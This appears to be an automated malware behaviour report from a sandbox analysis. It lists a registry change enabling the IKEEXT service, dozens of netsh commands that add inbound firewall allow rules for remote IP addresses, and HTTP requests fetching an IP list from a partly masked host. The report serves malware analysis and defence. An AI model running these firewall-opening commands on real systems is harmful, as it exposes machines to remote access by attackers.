Technical Information
To ensure autorun and distribution
Sets the following service settings
- [HKLM\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
Malicious functions
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_113.185.41.119" dir=in action=allow remoteip=113.185.41.119
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_201.88.48.27" dir=in action=allow remoteip=201.88.48.27
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_97.99.76.233" dir=in action=allow remoteip=97.99.76.233
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_177.73.98.21" dir=in action=allow remoteip=177.73.98.21
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_82.78.188.87" dir=in action=allow remoteip=82.78.188.87
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_187.201.113.173" dir=in action=allow remoteip=187.201.113.173
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_95.22.156.14" dir=in action=allow remoteip=95.22.156.14
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_188.172.220.71" dir=in action=allow remoteip=188.172.220.71
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_143.208.15.63" dir=in action=allow remoteip=143.208.15.63
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_103.136.43.2" dir=in action=allow remoteip=103.136.43.2
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_177.228.108.47" dir=in action=allow remoteip=177.228.108.47
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_37.19.200.21" dir=in action=allow remoteip=37.19.200.21
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_62.74.20.93" dir=in action=allow remoteip=62.74.20.93
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_62.103.218.204" dir=in action=allow remoteip=62.103.218.204
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_186.175.246.25" dir=in action=allow remoteip=186.175.246.25
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_103.50.33.200" dir=in action=allow remoteip=103.50.33.200
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_179.0.119.58" dir=in action=allow remoteip=179.0.119.58
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_185.183.33.218" dir=in action=allow remoteip=185.183.33.218
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_38.25.77.124" dir=in action=allow remoteip=38.25.77.124
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_191.7.4.23" dir=in action=allow remoteip=191.7.4.23
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_201.21.129.157" dir=in action=allow remoteip=201.21.129.157
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_179.6.155.34" dir=in action=allow remoteip=179.6.155.34
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_172.245.37.53" dir=in action=allow remoteip=172.245.37.53
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_185.107.56.158" dir=in action=allow remoteip=185.107.56.158
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_45.235.160.218" dir=in action=allow remoteip=45.235.160.218
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_89.187.185.165" dir=in action=allow remoteip=89.187.185.165
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_186.12.44.227" dir=in action=allow remoteip=186.12.44.227
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_188.24.180.229" dir=in action=allow remoteip=188.24.180.229
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_132.184.129.118" dir=in action=allow remoteip=132.184.129.118
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_178.59.110.144" dir=in action=allow remoteip=178.59.110.144
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_177.130.83.88" dir=in action=allow remoteip=177.130.83.88
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AuthControl_45.191.80.185" dir=in action=allow remoteip=45.191.80.185
Launches a large number of processes
Network activity
Connects to
- 'ui####b8.mywhc.ca':80
TCP
HTTP GET requests
- http://ui####b8.mywhc.ca/system/auth/ips.txt
UDP
- DNS ASK ui####b8.mywhc.ca
- 'localhost':52463
- 'localhost':59890
Miscellaneous
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_113.185.41.119" | findstr /C:"remoteip=113.185.41.119" > nul
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_188.172.220.71"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_188.172.220.71" | findstr /C:"remoteip=188.172.220.71" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_143.208.15.63" dir=in action=allow remoteip=143.208.15.63
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=143.208.15.63"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_143.208.15.63"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_143.208.15.63" | findstr /C:"remoteip=143.208.15.63" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_103.136.43.2" dir=in action=allow remoteip=103.136.43.2
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=103.136.43.2"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_103.136.43.2"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_103.136.43.2" | findstr /C:"remoteip=103.136.43.2" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_177.228.108.47" dir=in action=allow remoteip=177.228.108.47
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=177.228.108.47"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_177.228.108.47"
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=188.172.220.71"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_177.228.108.47" | findstr /C:"remoteip=177.228.108.47" > nul
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=37.19.200.21"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_37.19.200.21"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_37.19.200.21" | findstr /C:"remoteip=37.19.200.21" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_62.74.20.93" dir=in action=allow remoteip=62.74.20.93
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=62.74.20.93"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_62.74.20.93"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_62.74.20.93" | findstr /C:"remoteip=62.74.20.93" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_62.103.218.204" dir=in action=allow remoteip=62.103.218.204
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=62.103.218.204"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_62.103.218.204"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_62.103.218.204" | findstr /C:"remoteip=62.103.218.204" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_186.175.246.25" dir=in action=allow remoteip=186.175.246.25
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=186.175.246.25"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_37.19.200.21" dir=in action=allow remoteip=37.19.200.21
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_188.172.220.71" dir=in action=allow remoteip=188.172.220.71
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_95.22.156.14" | findstr /C:"remoteip=95.22.156.14" > nul
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_95.22.156.14"
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=45.191.80.185"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_45.191.80.185"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_45.191.80.185" | findstr /C:"remoteip=45.191.80.185" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_177.130.83.88" dir=in action=allow remoteip=177.130.83.88
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=177.130.83.88"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_177.130.83.88"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_177.130.83.88" | findstr /C:"remoteip=177.130.83.88" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_201.88.48.27" dir=in action=allow remoteip=201.88.48.27
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=201.88.48.27"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_201.88.48.27"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_201.88.48.27" | findstr /C:"remoteip=201.88.48.27" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_97.99.76.233" dir=in action=allow remoteip=97.99.76.233
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=97.99.76.233"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_97.99.76.233"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_97.99.76.233" | findstr /C:"remoteip=97.99.76.233" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_177.73.98.21" dir=in action=allow remoteip=177.73.98.21
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=177.73.98.21"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_177.73.98.21"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_177.73.98.21" | findstr /C:"remoteip=177.73.98.21" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_82.78.188.87" dir=in action=allow remoteip=82.78.188.87
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=82.78.188.87"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_82.78.188.87"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_82.78.188.87" | findstr /C:"remoteip=82.78.188.87" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_187.201.113.173" dir=in action=allow remoteip=187.201.113.173
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=187.201.113.173"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_187.201.113.173"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_187.201.113.173" | findstr /C:"remoteip=187.201.113.173" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_95.22.156.14" dir=in action=allow remoteip=95.22.156.14
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=95.22.156.14"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_186.175.246.25"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_45.191.80.185" dir=in action=allow remoteip=45.191.80.185
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_186.175.246.25" | findstr /C:"remoteip=186.175.246.25" > nul
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=103.50.33.200"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_185.107.56.158" | findstr /C:"remoteip=185.107.56.158" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_45.235.160.218" dir=in action=allow remoteip=45.235.160.218
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=45.235.160.218"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_45.235.160.218"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_45.235.160.218" | findstr /C:"remoteip=45.235.160.218" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_89.187.185.165" dir=in action=allow remoteip=89.187.185.165
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=89.187.185.165"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_89.187.185.165"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_89.187.185.165" | findstr /C:"remoteip=89.187.185.165" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_186.12.44.227" dir=in action=allow remoteip=186.12.44.227
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=186.12.44.227"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_186.12.44.227"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_186.12.44.227" | findstr /C:"remoteip=186.12.44.227" > nul
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_185.107.56.158"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_188.24.180.229" dir=in action=allow remoteip=188.24.180.229
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_188.24.180.229"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_188.24.180.229" | findstr /C:"remoteip=188.24.180.229" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_132.184.129.118" dir=in action=allow remoteip=132.184.129.118
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=132.184.129.118"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_132.184.129.118"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_132.184.129.118" | findstr /C:"remoteip=132.184.129.118" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_178.59.110.144" dir=in action=allow remoteip=178.59.110.144
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=178.59.110.144"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_178.59.110.144"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_178.59.110.144" | findstr /C:"remoteip=178.59.110.144" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_113.185.41.119" dir=in action=allow remoteip=113.185.41.119
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=113.185.41.119"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_113.185.41.119"
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=188.24.180.229"
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=185.107.56.158"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_185.107.56.158" dir=in action=allow remoteip=185.107.56.158
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_172.245.37.53" | findstr /C:"remoteip=172.245.37.53" > nul
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_103.50.33.200"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_103.50.33.200" | findstr /C:"remoteip=103.50.33.200" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_179.0.119.58" dir=in action=allow remoteip=179.0.119.58
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=179.0.119.58"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_179.0.119.58"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_179.0.119.58" | findstr /C:"remoteip=179.0.119.58" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_185.183.33.218" dir=in action=allow remoteip=185.183.33.218
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=185.183.33.218"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_185.183.33.218"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_185.183.33.218" | findstr /C:"remoteip=185.183.33.218" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_38.25.77.124" dir=in action=allow remoteip=38.25.77.124
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=38.25.77.124"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_38.25.77.124"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_38.25.77.124" | findstr /C:"remoteip=38.25.77.124" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_191.7.4.23" dir=in action=allow remoteip=191.7.4.23
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=191.7.4.23"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_191.7.4.23"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_191.7.4.23" | findstr /C:"remoteip=191.7.4.23" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_201.21.129.157" dir=in action=allow remoteip=201.21.129.157
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=201.21.129.157"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_201.21.129.157"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_201.21.129.157" | findstr /C:"remoteip=201.21.129.157" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_179.6.155.34" dir=in action=allow remoteip=179.6.155.34
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=179.6.155.34"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_179.6.155.34"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_179.6.155.34" | findstr /C:"remoteip=179.6.155.34" > nul
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_172.245.37.53" dir=in action=allow remoteip=172.245.37.53
- '%WINDIR%\syswow64\findstr.exe' /C:"remoteip=172.245.37.53"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall show rule name="AuthControl_172.245.37.53"
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AuthControl_103.50.33.200" dir=in action=allow remoteip=103.50.33.200
- '%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall show rule name="AuthControl_177.39.133.147" | findstr /C:"remoteip=177.39.133.147" > nul
